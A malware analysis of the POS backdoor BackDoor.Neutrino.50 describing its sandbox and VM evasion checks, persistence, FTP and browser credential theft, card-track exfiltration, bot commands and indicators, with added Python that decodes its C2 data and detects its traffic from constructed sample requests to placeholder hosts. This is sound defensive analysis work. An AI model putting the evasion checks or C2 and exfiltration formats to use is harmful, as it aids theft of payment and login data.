SHA1: fcf7197bbae81292dc9e444dd9ee1fb6f510cd05 (packed), a2b801df9bd8438adcf3c08d44bc42e34a83f7d8 (unpacked)
A multicomponent backdoor that can infect POS terminals. It can exploit the CVE-2012-0158 vulnerability to spread.
Once launched, the backdoor checks its environment for debuggers, sandboxes, and virtual machines as follows:
- Calls the IsDebuggerPresent API to check for an attached debugger
- Calls the CheckRemoteDebuggerPresent API to check for an attached debugger
- Checks whether the user name is similar to any of the following:
  - MALTEST
  - TEQUILABOOMBOOM
  - SANDBOX
  - VIRUS
  - MALWARE
- Converts the file name to lowercase and checks whether it is similar to any of the following:
  - SAMPLE
  - VIRUS
  - SANDBOX
- Checks whether kernel32.dll exports "wine_get_unix_file_name" (a sign of running under Wine)
- Checks whether the "HKLM\\SOFTWARE\\VMware, Inc.\\VMware Tools" registry key exists
- Compares the "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0\\Identifier" registry value with "VMWARE", "VBOX", "QEMU"
- Compares the "HKLM\\HARDWARE\\Description\\System\\SystemBiosVersion" registry value with "VBOX", "QEMU", "BOCHS"
- Checks whether the "HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions" registry key exists
- Compares the "HKLM\\HARDWARE\\Description\\System\\VideoBiosVersion" registry value with "VIRTUALBOX"
If a virtual machine is detected, the Trojan displays the following error message: “An unknown error occurred. Error - (0x[random number])”. After that, BackDoor.Neutrino.50 initiates a self-removal process.
During installation, the Trojan creates the "%AppData%\\W2VTWFFiQQ" directory, copies itself there, and adds an entry to "Software\\Microsoft\\Windows\\CurrentVersion\\Run" so that it starts automatically. The branch (HKLM or HKCU) is chosen depending on whether the process has administrator privileges.
As the name of the entry, the Trojan picks a file from the %windir% directory matching one of the following masks:
- install*.exe
- setup*.exe
- update*.exe
- patch*.exe
If no file matches, the Trojan uses the name "svchost.exe".
The malware copies the creation date of "explorer.exe" to its own file and sets the "hidden" and "system" attributes on it.
The Trojan then starts a separate thread that monitors the registry value responsible for autorun; if the value is modified or removed, the Trojan restores it.
Once running, the backdoor gathers information on the infected system: the machine GUID ("HKLM\\Software\\Microsoft\\Cryptography\\MachineGuid"), OS version, architecture, and the type and version of installed anti-virus software.
The Trojan can also remove other malicious programs found on the system. To do so, it checks every executable file in %APPDATA%, %TEMP%, and %ALLUSERSPROFILE% with the WinVerifyTrust function. If verification fails and a running process corresponds to the file, the backdoor removes the file's entry from "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" (again choosing the HKLM or HKCU branch according to its privileges) and then deletes the file.
The backdoor counts the number of programs removed this way and reports it to the command and control server.
In addition to its POS functionality, the Trojan can steal information stored by the Microsoft Mail client and the FTP credentials saved by the following well-known FTP clients:
filezilla.exe
ftprush.exe
winscp.exe
coreftp.exe
freeftp.exe
far.exe
ftpte.exe
smartftp.exe
flashfxp.exe
totalcmd.exe
Among running processes, the Trojan looks for the following browsers:
firefox.exe
chrome.exe
iexplore.exe
opera.exe
In these processes it hooks the data-sending functions PR_Write, send, WSASend, HttpSendRequestW, and InternetWriteFile. Data from POST requests containing the "ocsp" or "application/ocsp-request" substrings is sent to the command and control server; for Internet Explorer, data from all POST requests is sent.
The "rate" value in the "HKCU\\Software\\N3NNetwork\\" branch stores the time interval between requests to the server. The backdoor reads this value and multiplies it by 60 seconds; the result is capped at 1 hour.
Data is sent as the string "cmd=1&uid=%s&os=%s&av=%s&version=%s&quality=%i", where uid is the GUID of the infected computer, os describes the OS, av names the installed anti-virus, version is the version of the backdoor, and quality is the number of detected viruses.
The list of command and control servers is hard-coded in the Trojan's body as a base64-encoded UNICODE string. The string can contain several server addresses separated by '*'. During initialization, the backdoor tries all the servers until it finds one that replies to a PING request.
Server reply to a PING request can look as follows:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>
The requested URL /ionocube_/tasks.php was not found on this server.</BODY></HTML>
<!-- DEBUGcG9uZw==DEBUG -->
From the reply, the backdoor extracts the base64-encoded payload located between the two "DEBUG" markers.
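The two encodings just described, the '*'-separated UNICODE server list and the DEBUG-delimited PING reply, are straightforward to reproduce in an analysis script. The following Python is an added example, not Dr.Web's code and not the malware's: the server addresses are constructed placeholders, "UNICODE" is assumed to mean UTF-16LE, the reply is the one quoted above (its cG9uZw== does decode to "pong"), and treating a decoded "pong" as the liveness marker is an assumption.

```python
import base64
import binascii
from typing import List, Optional

# Constructed sample of the hard-coded server list. The page describes it as a
# UNICODE string of '*'-separated addresses, base64-encoded; UTF-16LE is assumed
# here as the meaning of "UNICODE". The host names are placeholders, not real C2s.
_SERVER_LIST_PLAIN = (
    "http://c2-placeholder-1.invalid/ionocube_/tasks.php*"
    "http://c2-placeholder-2.invalid/ionocube_/tasks.php"
)
SAMPLE_SERVER_BLOB = base64.b64encode(_SERVER_LIST_PLAIN.encode("utf-16-le")).decode("ascii")

# The PING reply quoted on the page: a decoy 404 page with the real payload in
# the trailing HTML comment between two DEBUG markers.
SAMPLE_PING_REPLY = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML>\n'
    b"<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>\n"
    b"The requested URL /ionocube_/tasks.php was not found on this server.</BODY></HTML>\n"
    b"<!-- DEBUGcG9uZw==DEBUG -->\n"
)
MARKER = b"DEBUG"


def decode_server_list(blob: str) -> List[str]:
    """Base64-decode the UTF-16LE blob and split it on '*' into addresses."""
    text = base64.b64decode(blob).decode("utf-16-le").rstrip("\x00")
    return [addr for addr in text.split("*") if addr]


def extract_debug_payload(reply: bytes) -> Optional[bytes]:
    """Return the decoded bytes between the DEBUG markers, or None if the reply
    has no complete marker pair or the text between them is not valid base64."""
    start = reply.find(MARKER)
    if start < 0:
        return None
    start += len(MARKER)
    end = reply.find(MARKER, start)
    if end < 0:
        return None
    try:
        return base64.b64decode(reply[start:end], validate=True)
    except (binascii.Error, ValueError):
        return None


def is_live_c2_reply(reply: bytes) -> bool:
    """Assumption: the server counts as alive when the payload decodes to
    "pong", the value carried by the reply quoted on the page."""
    return extract_debug_payload(reply) == b"pong"


if __name__ == "__main__":
    print(decode_server_list(SAMPLE_SERVER_BLOB))
    print(extract_debug_payload(SAMPLE_PING_REPLY), is_live_c2_reply(SAMPLE_PING_REPLY))
```

The same marker-extraction routine is what a proxy or IDS rule would key on: a 404 page whose HTML comment carries a DEBUG...DEBUG base64 block is a far more specific indicator than the request URL, which looks like an ordinary missing PHP script.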
The Trojan reads the command and control server address from the registry, decrypts it, and generates the following request:
"POST <!target> HTTP/1.0\r\n"
"Host: \r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"Cookie: authkeys=21232f297a57a5a743894a0e4a801fc3\r\n"
"Content-length: <!len>\r\n"
"\r\n"
"<!payload>\n",
where target and host are taken from the address of the server the data is sent to, len is the payload length, and payload is the base64-encoded string.
Bank card data is sent in the following package:
d=1&type=%s&data=%s
where type is the string "Track1" or "Track2" and data is the track data extracted from process memory.
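To show how the request template and the two body formats above translate into a network-side detection, the following Python is an added example, not Dr.Web's code and not the malware's. It assumes the POST body carries the base64-encoded form string, as the template description states, and falls back to reading the body as a plain form; the fixed User-Agent and Cookie values come from the template on this page, while every request sample, host name, GUID and track value is constructed. The User-Agent is a stock Firefox 35 string, so it is treated as supporting evidence only; the fixed authkeys cookie and the body shape are the strong indicators.

```python
import base64
import binascii
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs

# Fixed values quoted in the request template on this page.
TEMPLATE_USER_AGENT = ("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) "
                       "Gecko/20100101 Firefox/35.0")
TEMPLATE_COOKIE = "authkeys=21232f297a57a5a743894a0e4a801fc3"
BEACON_FIELDS = {"cmd", "uid", "os", "av", "version", "quality"}


def make_sample_request(host: str, target: str, form: str) -> bytes:
    """Constructed test traffic shaped like the template on the page: the form
    string is base64-encoded and sent as the POST body, followed by a newline."""
    payload = base64.b64encode(form.encode("ascii")).decode("ascii")
    head = (
        f"POST {target} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {TEMPLATE_USER_AGENT}\r\n"
        "Content-type: application/x-www-form-urlencoded\r\n"
        f"Cookie: {TEMPLATE_COOKIE}\r\n"
        f"Content-length: {len(payload) + 1}\r\n"
        "\r\n"
    )
    return (head + payload + "\n").encode("ascii")


# Constructed samples: placeholder host, GUID, and track data.
SAMPLE_BEACON = make_sample_request(
    "c2-placeholder.invalid", "/ionocube_/tasks.php",
    "cmd=1&uid={00000000-0000-0000-0000-000000000000}&os=Windows_7_x64&av=none&version=50&quality=3",
)
SAMPLE_CARD = make_sample_request(
    "c2-placeholder.invalid", "/ionocube_/tasks.php",
    "d=1&type=Track2&data=TRACK2-PLACEHOLDER",
)
SAMPLE_BENIGN = (
    b"POST /login HTTP/1.1\r\nHost: intranet.example\r\nUser-Agent: curl/8.0\r\n"
    b"Content-type: application/x-www-form-urlencoded\r\nContent-length: 21\r\n\r\n"
    b"user=alice&remember=1\n"
)


def split_request(raw: bytes) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP request into request line, lower-cased header map, and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.decode("latin-1").strip()


def decode_body(body: str) -> Dict[str, List[str]]:
    """Try the base64-encoded form first (as the page describes), then plain form."""
    try:
        form = base64.b64decode(body, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        form = body
    return parse_qs(form, keep_blank_values=True)


def classify_request(raw: bytes) -> Dict[str, object]:
    """Return a verdict plus the indicators that fired and the parsed form fields."""
    request_line, headers, body = split_request(raw)
    reasons: List[str] = []
    kind: Optional[str] = None
    fields: Dict[str, List[str]] = {}
    if request_line.startswith("POST "):
        if headers.get("cookie") == TEMPLATE_COOKIE:
            reasons.append("fixed authkeys cookie from the template")
        if headers.get("user-agent") == TEMPLATE_USER_AGENT:
            reasons.append("user-agent string from the template (weak on its own)")
        fields = decode_body(body)
        if fields.get("cmd") == ["1"] and BEACON_FIELDS.issubset(fields):
            kind = "beacon"
            reasons.append("cmd=1&uid=&os=&av=&version=&quality= beacon body")
        elif (fields.get("d") == ["1"] and "data" in fields
              and fields.get("type", [""])[0] in ("Track1", "Track2")):
            kind = "card_exfil"
            reasons.append("d=1&type=Track1|Track2&data= card package")
    strong = kind is not None or headers.get("cookie") == TEMPLATE_COOKIE
    return {"verdict": "neutrino_c2" if strong else "benign",
            "kind": kind, "reasons": reasons, "fields": fields}


if __name__ == "__main__":
    for sample in (SAMPLE_BEACON, SAMPLE_CARD, SAMPLE_BENIGN):
        print(classify_request(sample))
```

Because the body is base64, a plain content-match on "cmd=1&uid=" will never fire on the wire; the detector has to decode first, which is also why the fixed cookie value is the cheapest single indicator to alert on.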
The backdoor can execute the following commands:

| Command | Description |
|---|---|
| botkiller | Remove other malicious programs |
| cmd | Forward the command to the command interpreter (cmd.exe) |
| dwflood | Flood a remote host with requests to download a file (the file is downloaded, deleted, and downloaded again) |
| findfile | Find the specified file and upload it to the remote server |
| http | Send a GET or a POST request |
| https | Launch an HTTPS Flood attack |
| infect | Infect computers on the LAN and removable media |
| keylogger | Run the keylogger (logs clipboard contents and keystrokes and takes a screenshot on each mouse click) |
| loader | Download a .dll file and run it with the regsvr32 tool |
| rate | Set the time interval between requests to the server |
| slow | Send a POST request bearing the "X-a: b\r\n" payload |
| tcp | Launch a TCP Flood attack |
| udp | Launch a UDP Flood attack |
| update | Update itself (the update is downloaded from the link given in the command) |
The backdoor's presence on a system can be detected by the following indicators:
- Mutex: "W2VTWFFiQQ"
- Directory: "%AppData%\\W2VTWFFiQQ"
- Presence of the "HKCU\\Software\\N3NNetwork\\" registry branch